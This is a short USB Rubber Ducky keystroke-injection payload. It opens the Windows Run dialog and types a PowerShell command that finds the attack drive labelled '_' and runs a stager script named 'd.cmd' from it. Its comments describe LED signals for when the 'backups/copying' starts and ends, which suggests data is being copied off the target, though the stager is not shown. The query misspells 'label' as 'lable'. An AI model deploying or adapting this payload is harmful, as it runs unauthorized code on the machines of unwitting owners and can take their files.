DELAY 1000
GUI r
DELAY 100

REM Find ducky drive "_", and run stager script named "d.cmd" big thanks to Diggster
REM powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'_'}|select name;cd $u.name;.\d.cmd"
REM Above 'cd' to drive before running, below runs "d.cmd" script with drive leteer included
STRING powershell ".((gwmi win32_volume -f 'lable=''_''').Name+'d.cmd')"
ENTER
REM The LED for [CAPSLOCK] will blink 4 times when script has started
REM  and 4 times again when finished with backups/copying.
